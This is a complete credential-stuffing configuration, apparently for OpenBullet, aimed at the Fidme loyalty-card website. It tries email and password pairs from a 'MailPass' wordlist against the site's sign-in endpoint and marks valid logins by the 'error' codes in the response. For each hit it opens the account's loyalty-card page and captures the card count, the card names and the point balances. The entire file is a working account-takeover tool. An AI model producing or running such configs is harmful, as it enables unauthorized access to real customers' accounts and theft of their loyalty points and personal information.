[SETTINGS]
{
  "Name": "Fidme ( Capture ) ",
  "SuggestedBots": 5,
  "LastModified": "2018-06-29T15:15:24.4573512+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN REQUEST POST "https://www.fidme.com/fr/signin" AutoRedirect=FALSE 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.fidme.com/fr" 
  HEADER "Origin: https://www.fidme.com" 
#SESSION_ID PARSE "<SOURCE>" LR "session_id\":\"" "\",\"" Recursive=FALSE -> VAR "_fidme_session_id" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "error\":2" 
  KEYCHAIN Success OR 
    KEY "error\":0" 
#GET_CAPTURE_PAGE REQUEST GET "https://fidme.com/extranet/customer/fid_cards" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "_fidme_session_id: <_fidme_session_id>" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.fidme.com/fr" 
  HEADER "Origin: https://www.fidme.com" 
#CAPTURE_NBR_CARTES PARSE "<SOURCE>" LR "<p class='bold'>Résultats: " ".</p>" Recursive=FALSE -> CAP "NBR CARTES" "" "" 
#CAPTURE_NOM_CARTES PARSE "<SOURCE>" LR "<img src='/images/loyalty_cards/" "_logo_medium.png' />" Recursive=TRUE -> CAP "Nom Cartes" "" "" 
#CAPTURE_POINTS PARSE "<SOURCE>" LR "<td class='checks center'>" "</div>" Recursive=TRUE -> CAP "Capture Points Cartes" "" "" 
